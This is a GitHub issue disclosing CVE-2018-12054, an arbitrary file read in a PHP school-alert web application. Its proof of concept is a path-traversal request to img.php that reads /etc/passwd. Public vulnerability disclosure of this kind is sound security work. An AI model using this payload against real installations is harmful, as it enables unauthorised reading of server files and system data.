Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[CVE-2018-12054] Schools Alert Management Script - Arbitrary File Read #4

Open
unh3x opened this issue Jun 7, 2018 · 0 comments
Open

Comments

@unh3x
Copy link
Owner

unh3x commented Jun 7, 2018

=================
Schools Alert Management Script - Arbitrary File Read

Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: M3@pandas From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12054

=================
Vulnerable cgi:

img.php

=================
Proof of Concept:

/img.php?f=/./etc/./passwd

image

@unh3x unh3x changed the title Schools Alert Management Script - Arbitrary File Read [CVE-2018-12054] Schools Alert Management Script - Arbitrary File Read Jun 9, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant